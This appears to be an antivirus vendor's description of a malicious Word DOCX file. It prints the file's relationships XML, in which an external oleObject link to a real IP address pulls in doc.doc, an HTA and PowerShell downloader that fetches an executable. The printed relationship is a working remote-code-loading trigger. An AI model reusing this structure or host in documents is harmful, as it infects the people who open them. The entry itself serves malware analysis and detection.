SHA1:
- c85e3179793072b72f885aba702653cec128b16b
Vulnerability for Microsoft Word implemented as a Microsoft Word document with DOCX extension. Contains the following strings:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://***.org/package/2006/relationships"><Relationship Id="rId3" Type="http:// ***.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http:// ***.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://***/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://***/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://***/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://***/officeDocument/2006/relationships/oleObject" Target="http://144.217.14.173/doc.doc" TargetMode="External"/><Relationship Id="rId4" Type="http://***/officeDocument/2006/relationships/image" Target="media/image1.emf"/></Relationships>
Once this document is opened, another file called doc.doc is loaded. It contains embedded HTA script, detected by Dr.Web as PowerShell.DownLoader.72.
During its execution, PowerShell.DownLoader.72 calls an interpreter PowerShell. It processes another malicious script that downloads an executable file to the attacked computer.